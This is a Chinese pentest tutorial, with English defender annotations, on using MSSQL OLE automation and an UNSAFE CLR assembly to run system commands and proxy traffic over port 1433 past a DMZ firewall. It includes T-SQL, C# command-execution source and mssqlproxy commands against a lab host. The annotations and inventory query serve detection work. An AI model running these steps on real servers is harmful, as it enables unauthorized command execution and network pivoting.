利用MSSQL搭建代理突破DMZ访问受限网络

0x00 背景介绍

渗透测试中经常利用数据库连接突破 DMZ,前天看到有分享利用 MSSQL 搭建代理突破 DMZ 访问不出网的应用资产。Microsoft SQL Server 现在具备与 Microsoft Windows .NET Framework 的公共语言运行时 (CLR) 组件集成的功能。CLR 为托管代码提供服务,例如跨语言集成、代码访问安全性、对象生存期管理以及调试和分析支持。CLR 可以使用 .NET Framework 语言编写存储过程、触发器、用户定义类型、用户定义函数(标量函数和表值函数)以及用户定义的聚合函数。

0x01 环境部署

数据库服务:

演示环境:Windows Server 2008 R2 Standard

测试机地址:192.168.3.174

MSSQL版本:Microsoft SQL Server 2012 - 11.0.2100.60 (X64)

歪果大佬遇到的场景是:获取互联网侧服务器权限后,通过信息收集或常规渗透控制了 MSSQL 数据库;防火墙规则只允许 1433 端口通过,无法直接访问核心服务器,于是通过 MSSQL 数据库构造代理,访问内部资源服务。

0x02 文件操作

开启 sp_OACreate

-- Changing a server option needs ALTER SETTINGS (sysadmin / serveradmin).
-- 'show advanced options' must be on before 'Ole Automation Procedures' is
-- settable, and each change only takes effect at RECONFIGURE.
EXEC master.dbo.sp_configure 'show advanced options',1;RECONFIGURE;

-- Defender note: 'Ole Automation Procedures' is off by default. Its current
-- value is visible in sys.configurations, and flipping it is a server-level
-- configuration change that is worth auditing / alerting on, since every
-- sp_OA* step further down this page depends on it.
EXEC master.dbo.sp_configure 'Ole Automation Procedures', 1;RECONFIGURE;

关闭 sp_OACreate

-- Reverses the change above: advanced options are exposed, OLE automation is
-- switched off, and advanced options are hidden again. Order matters — the
-- 'ole automation procedures' option is only settable while
-- 'show advanced options' is 1.
EXEC sp_configure 'show advanced options',1;reconfigure;

-- Defender note: the off→on→off sequence still leaves a trace — the value
-- changes are visible to SQL Server Audit and the option history, so a
-- cleanup like this does not undo the audit record.
EXEC sp_configure 'ole automation procedures',0;reconfigure;

EXEC sp_configure 'show advanced options',0;reconfigure;

文件写入

-- Writes a one-line text file on the SQL Server host through OLE automation
-- (Scripting.FileSystemObject). The COM object is created inside the SQL
-- Server process, so the file is written with the service account's rights.
DECLARE @o int, @f int, @t int, @ret int   -- @t is declared but never used here

DECLARE @line varchar(8000)                -- declared but never used here

EXEC sp_OACreate 'scripting.filesystemobject',@o out

-- CreateTextFile(path, overwrite): the trailing 1 means an existing file at
-- that path is overwritten.
EXEC sp_OAMethod @o, 'createtextfile', @f out, 'C:\windows\temp\c4.txt', 1

-- @ret receives the HRESULT (0 on success) but is never inspected, and
-- neither @f nor @o is released (no 'close' call, no sp_OADestroy) in this
-- snippet.
EXEC @ret = sp_OAMethod @f, 'writeline', NULL ,'C4'

0x03 命令执行

using System;

using System.Data;

using System.Data.SqlClient;

using System.Data.SqlTypes;

using Microsoft.SqlServer.Server;

using System.IO;

using System.Diagnostics;

using System.Text;


public partial class StoredProcedures

{

// CLR stored procedure as listed on the page: runs the caller-supplied string
// through cmd.exe /C and returns its standard output as a single
// NVARCHAR(4000) row. The page catalogs the assembly with
// PERMISSION_SET = UNSAFE (see the CREATE ASSEMBLY statement further down),
// so this code runs without CLR sandbox restrictions inside the SQL Server
// service process.
//
// Defender notes:
//  - Because Process.Start() is called from inside the database engine, the
//    host-side signal for this technique is cmd.exe appearing as a child of
//    sqlservr.exe. Catalog-side, sys.assemblies rows with
//    permission_set_desc = 'UNSAFE' and the matching sys.assembly_modules row
//    are what the inventory query in section 0x04 enumerates.
//  - The procedure exists only while the assembly is cataloged; the DLL on
//    disk and the sp_configure changes made earlier on the page outlive it.
[Microsoft.SqlServer.Server.SqlProcedure]

// execCommand: text appended after "cmd.exe /C" and handed to the shell
// unchanged. NOTE: SqlString.Value throws SqlNullValueException when the
// argument is SQL NULL; nothing here guards against that.
public static void cmd_exec (SqlString execCommand)

{

Process proc = new Process();

proc.StartInfo.FileName = @"C:\Windows\System32\cmd.exe";

proc.StartInfo.Arguments = string.Format(@" /C {0}", execCommand.Value);

// UseShellExecute must be false for stream redirection below to be allowed.
proc.StartInfo.UseShellExecute = false;

// Only stdout is redirected; stderr is not captured and never reaches the
// result set.
proc.StartInfo.RedirectStandardOutput = true;

proc.Start();


// Create the record and specify the metadata for the columns.
// A single column, "output", NVARCHAR(4000); longer output is not handled here.

SqlDataRecord record = new SqlDataRecord(new SqlMetaData("output", SqlDbType.NVarChar, 4000));

// Mark the beginning of the result set.

SqlContext.Pipe.SendResultsStart(record);


// Set values for each column in the row
// Reading stdout to EOF before WaitForExit() below avoids the child blocking
// on a full stdout pipe; the .ToString() on a string is redundant.

record.SetString(0, proc.StandardOutput.ReadToEnd().ToString());


// Send the row back to the client.

SqlContext.Pipe.SendResultsRow(record);

// Mark the end of the result set.

SqlContext.Pipe.SendResultsEnd();

// Exit code is not checked; a failing command still yields one row.
proc.WaitForExit();

proc.Close();

}

};

使用 csc.exe 编译 dll 文件

REM Compiles the CLR procedure above into a DLL (/target:library) with the
REM .NET Framework 4.x 64-bit C# compiler; the output DLL is what the next
REM step writes onto the SQL Server host.
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe /target:library d:\mssqlproxy\cmdexce.cs

写入编译好的 dll 文件

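-- Writes the compiled assembly to disk through ADODB.Stream — the same OLE
-- automation path as the text-file example above, so it too depends on
-- 'Ole Automation Procedures' being on and runs as the service account.
-- The page's listing lost the binary argument of 'Write' and split the final
-- statement across two lines; both are repaired here, with the elided bytes
-- replaced by a labelled placeholder rather than reconstructed.
DECLARE @ob INT;

-- Type 1 = adTypeBinary.
EXEC sp_OACreate 'ADODB.Stream', @ob OUTPUT;EXEC sp_OASetProperty @ob, 'Type', 1;

-- <DLL_BYTES_AS_HEX_LITERAL> stands for the assembly bytes, which are not on
-- the page.
EXEC sp_OAMethod @ob, 'Open';EXEC sp_OAMethod @ob, 'Write', NULL, <DLL_BYTES_AS_HEX_LITERAL>;

-- SaveToFile option 2 = adSaveCreateOverWrite: an existing file is replaced.
-- Defender note: a DLL appearing under C:\windows\temp written by the SQL
-- Server service account is the file-system artifact of this step.
EXEC sp_OAMethod @ob, 'SaveToFile', NULL, 'c:\windows\temp\cmd_exec.dll', 2;

EXEC sp_OAMethod @ob, 'Close';EXEC sp_OADestroy @ob;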

执行系统命令

-- Catalogs the DLL written above as a CLR assembly and exposes its method as
-- a T-SQL procedure. This is the catalog-visible part of the technique: the
-- assembly and its bytes sit in sys.assemblies / sys.assembly_files until the
-- DROPs at the bottom run. CLR integration ('clr enabled') has to be on for
-- this to execute — that step is not shown on the page.
CREATE ASSEMBLY my_assembly

FROM 'C:\windows\temp\cmd_exec.dll'

-- UNSAFE lifts all CLR code-access restrictions (the procedure starts a
-- process). NOTE(review): loading an UNSAFE assembly presumably also needs the
-- database to be TRUSTWORTHY or the assembly to be signed — not shown here.
WITH PERMISSION_SET = UNSAFE;


-- CREATE PROCEDURE must be the first statement in its batch; the page shows
-- no batch separator between it and CREATE ASSEMBLY, so in practice a GO is
-- needed before this line. The parameter is forwarded to cmd_exec() above.
CREATE PROCEDURE [dbo].[cmd_exec] @execCommand NVARCHAR (4000) AS EXTERNAL NAME [my_assembly].[StoredProcedures].[cmd_exec];

GO


-- Smoke test: the result set is cmd.exe's stdout as one row.
cmd_exec 'ver'


-- Cleanup removes the catalog rows only; the DLL on disk and the
-- configuration changes made earlier on the page remain for responders.
DROP PROCEDURE cmd_exec

DROP ASSEMBLY my_assembly

0x04 环境测试

# Interactive login with Windows authentication (the page uses the
# administrator account of the test host).
python mssqlclient.py administrator@192.168.3.174 -windows-auth

# Issued at the mssqlclient prompt, not the OS shell: places reciclador.dll in
# the SQL Server host's temp folder. NOTE(review): presumably written through
# the same OLE automation path as the T-SQL above, i.e. by the service account
# — verify. Defender note: the file under C:\windows\temp is the artifact of
# this step and survives the later cleanup.
upload reciclador.dll C:\windows\temp\reciclador.dll

# Registers assembly.dll as a CLR assembly from the client side (-install -clr);
# the catalog rows it creates are what the inventory query below enumerates.
python mssqlclient.py administrator@192.168.3.174 -windows-auth -install -clr assembly.dll

USE msdb;

-- Inventory of the CLR assemblies registered in this database, joined to the
-- procedures / functions that expose them. Useful on the defending side as a
-- periodic check: anything with permission_set_desc = 'UNSAFE' deserves a
-- look, and [content] carries the raw assembly bytes, so the same query
-- doubles as the forensic export of a suspicious module.
SELECT
    [schema_name]       = SCHEMA_NAME(o.[schema_id]),
    file_id             = f.file_id,
    [file_name]         = f.name + '.dll',
    clr_name            = a.clr_name,
    assembly_id         = a.assembly_id,
    [assembly_name]     = a.name,
    assembly_class      = m.assembly_class,
    assembly_method     = m.assembly_method,
    [sp_object_id]      = o.object_id,
    [sp_name]           = o.name,
    [sp_type]           = o.[type],
    permission_set_desc = a.permission_set_desc,
    create_date         = a.create_date,
    modify_date         = a.modify_date,
    content             = f.content
FROM sys.assemblies AS a
    JOIN sys.assembly_files   AS f ON f.assembly_id = a.assembly_id
    JOIN sys.assembly_modules AS m ON m.assembly_id = a.assembly_id
    JOIN sys.objects          AS o ON o.[object_id] = m.[object_id]

# -check: preflight of the uploaded DLL before starting; what exactly it
# verifies is not shown on the page.
python mssqlclient.py administrator@192.168.3.174 -windows-auth -check -reciclador "C:\windows\temp\reciclador.dll"

# -start: from here on the database session carries the proxied traffic, so the
# pivot rides over TCP 1433 — the one port the DMZ firewall allows (0x01).
# Defender note: unusually long-lived, high-volume 1433 sessions and new
# outbound connections originating from sqlservr.exe are the network-side
# signals of this stage.
python mssqlclient.py administrator@192.168.3.174 -windows-auth -start -reciclador "C:\windows\temp\reciclador.dll"

参考文章

https://github.com/blackarrowsec/mssqlproxy

https://www.blackarrow.net/mssqlproxy-pivoting-clr/

https://blog.netspi.com/attacking-sql-server-clr-assemblies/
